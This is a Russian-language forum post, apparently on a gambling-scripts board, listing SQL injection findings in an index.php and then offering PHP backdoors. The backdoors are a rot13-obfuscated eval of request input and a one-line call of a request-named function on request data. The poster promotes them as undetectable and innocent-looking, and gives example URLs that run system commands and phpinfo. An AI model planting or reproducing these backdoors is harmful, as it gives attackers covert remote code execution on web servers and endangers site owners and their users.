Наш генеральный спонсор - gamblingstore.ru предлагает готовые игровые решения и услуги для создания собственных проектов
а что дают эти запросы? лично у меня выводит к примеру:1) /index.php 18: $sql = $db->query("SELECT * FROM `users` WHERE `hash` = " . $db->quote( $_COOKIE['hash'])); SQL Injection
2) /index.php 351: $sql = $db->query('SELECT * FROM `trades` WHERE `id` = '.$db->quote( $_COOKIE['tid']).' AND `status` = 0'); SQL Injection
3) /index.php 395: $sql = $db->query('SELECT * FROM `trades` WHERE `id` = '.$db->quote( $_COOKIE['tid']).' AND `status` = 0'); SQL Injection
Уязвимые места index.php
Если нужно буде выложу больше
1) PHP-Backdoor, который ничем не палится и при этом выглядит не палевно
Код:<?php @$_REQUEST['large'](str_rot13('riny($_ERDHRFG["pbqr"]);')); ?>2) PHP-Backdoor, спасибо тебе, типизация которой нетКод:index.php?large=assert&code=echo 123; index.php?large=assert&code=system('echo 1;');
Код:<?php $_REQUEST['f']($_REQUEST['c']); ?>Код:index.php?f=assert&c=phpinfo(); index.php?f=eval&c=echo 1;